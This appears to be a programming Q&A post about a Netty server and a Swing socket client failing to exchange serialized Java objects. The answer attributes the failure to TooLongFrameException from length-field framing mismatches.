a method from the GUI client (which is a bit large, it's a Netbeans Swing JFrame):
/**
 * Stores the new Title and mirrors it into the text component.
 * NOTE(review): callers appear to invoke this from a socket-reader thread;
 * Swing updates belong on the EDT — confirm.
 */
public void setTitle(Title title) {
    this.title = title;
    text.setText(this.title.toString());
}
the point of the above method is for something to send objects to the GUI, which is then updated accordingly. Similarly, I want to fire updates, or other-wise wire the GUI to socket i/o.
I don't really understand the output from the netty server. Is it a problem that the server uses netty while the client uses sockets? Both use the same POJO, with the serialVersionUID value. Here's the netty handler code:
package net.bounceme.dur.netty;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;
import java.util.logging.Logger;
import net.bounceme.dur.jdbc.Title;
public class ServerHandler extends SimpleChannelInboundHandler<Title> {
private static final Logger log = Logger.getLogger(ServerHandler.class.getName());
public ServerHandler() {
log.info("starting..");
}
#Override
public boolean acceptInboundMessage(Object msg) throws Exception {
log.info(msg.toString());
return true;
}
#Override
public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
log.info(msg.toString());
ctx.write(new Title());
}
#Override
protected void channelRead0(ChannelHandlerContext chc, Title title) throws Exception {
log.info(title.toString());
chc.write(new Title());
}
}
Apparently, none of the server handler code is executed, as everything explodes immediately after the client connects.
server code:
package net.bounceme.dur.netty;
import io.netty.bootstrap.ServerBootstrap;
import io.netty.channel.ChannelInitializer;
import io.netty.channel.ChannelPipeline;
import io.netty.channel.EventLoopGroup;
import io.netty.channel.nio.NioEventLoopGroup;
import io.netty.channel.socket.SocketChannel;
import io.netty.channel.socket.nio.NioServerSocketChannel;
import io.netty.handler.codec.serialization.ClassResolvers;
import io.netty.handler.codec.serialization.ObjectDecoder;
import io.netty.handler.codec.serialization.ObjectEncoder;
import io.netty.handler.logging.LogLevel;
import io.netty.handler.logging.LoggingHandler;
import java.security.cert.CertificateException;
import java.util.logging.Logger;
import javax.net.ssl.SSLException;
public final class Server {
private static final Logger log = Logger.getLogger(Server.class.getName());
public static void main(String[] args) throws Exception {
MyProps p = new MyProps();
int port = p.getServerPort();
new Server().startServer(port, false);
}
private void startServer(int port, boolean ssl) throws CertificateException, SSLException, InterruptedException {
EventLoopGroup bossGroup = new NioEventLoopGroup(1);
EventLoopGroup workerGroup = new NioEventLoopGroup();
try {
ServerBootstrap b = new ServerBootstrap();
b.group(bossGroup, workerGroup)
.channel(NioServerSocketChannel.class)
.handler(new LoggingHandler(LogLevel.INFO))
.childHandler(new ChannelInitializer<SocketChannel>() {
#Override
public void initChannel(SocketChannel ch) throws Exception {
ChannelPipeline p = ch.pipeline();
p.addLast(
new ObjectEncoder(),
new ObjectDecoder(ClassResolvers.cacheDisabled(null)),
new ServerHandler());
}
});
b.bind(port).sync().channel().closeFuture().sync();
log.info("connected!");
} finally {
bossGroup.shutdownGracefully();
workerGroup.shutdownGracefully();
}
}
}
The TooLongFrameException raised by LengthFieldBasedFrameDecoder means one of the following:
The remote peer sent a very large message, which exceeds the limit. The default maximum length of a message is 1 MiB. If you expect to receive a message larger than that, specify an alternative maximum length when you construct a LengthFieldBasedFrameDecoder.
You passed wrong parameters to LengthFieldBasedFrameDecoder so that it is decoding a wrong place in your message. In this case, you'd better re-read the Javadoc of LengthFieldBasedFrameDecoder to specify the correct values for you.